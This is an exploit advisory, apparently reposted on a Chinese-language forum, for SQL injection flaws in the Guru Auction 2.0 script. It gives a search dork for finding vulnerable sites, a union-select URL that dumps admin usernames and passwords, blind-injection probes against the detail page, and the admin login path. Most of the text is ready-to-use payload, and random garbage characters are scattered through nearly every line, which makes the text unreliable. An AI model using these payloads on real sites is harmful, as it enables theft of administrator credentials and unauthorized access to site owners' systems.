Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
: ?: _: ~5 Y7 K" o; A
! Z! A" `0 Q T6 B" H# w' q8 p* X作者 : v3n0m' I- x$ y* s9 I& C: G6 V
应用 : Guru Auction 2.0* H9 ^0 n5 [. z0 j/ v7 J& G
Price : $49
9 j. Q0 V+ @0 W# `7 A* ]. A UVendor : http://www.guruscript.com// G9 {, I$ b% P
Google Dork : inurl:subcat.php?cate_id=
- S0 i. D( @2 m+ i% p0 O : _& h a; e0 U3 I, \) x
SQLi p0c:
5 @: t0 ?, I* ]2 q~~~~~~~~~~
- y( o9 Y( ^8 T7 I) M! k9 q+ {http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
. Y# J0 s; S! q! W7 p0 l9 O( Q7 V
m T6 Q$ Q. _: L7 S3 l0 t
7 I8 W4 `% o8 u盲注 p0c:0 x1 K" V8 ~) b. t0 k, ^0 w3 A
~~~~~~~~~~" H* Q: S- q0 k, M' P
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
( ]% M9 ^7 r5 p3 h% S. @5 V2 ]0 _http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false% V |* t1 J! o
/ F- ~8 K7 t# L( j: Y9 u. Y
管理登录入口:
9 C. D2 L& O6 a~~~~~~~~~~. B. B2 Z( I2 U" t
http://domain.tld/[path]/admin/' E& q- O$ @# k/ g$ E7 @2 E9 H
|
发表于 2012-12-31 09:24:05
收藏
支持
反对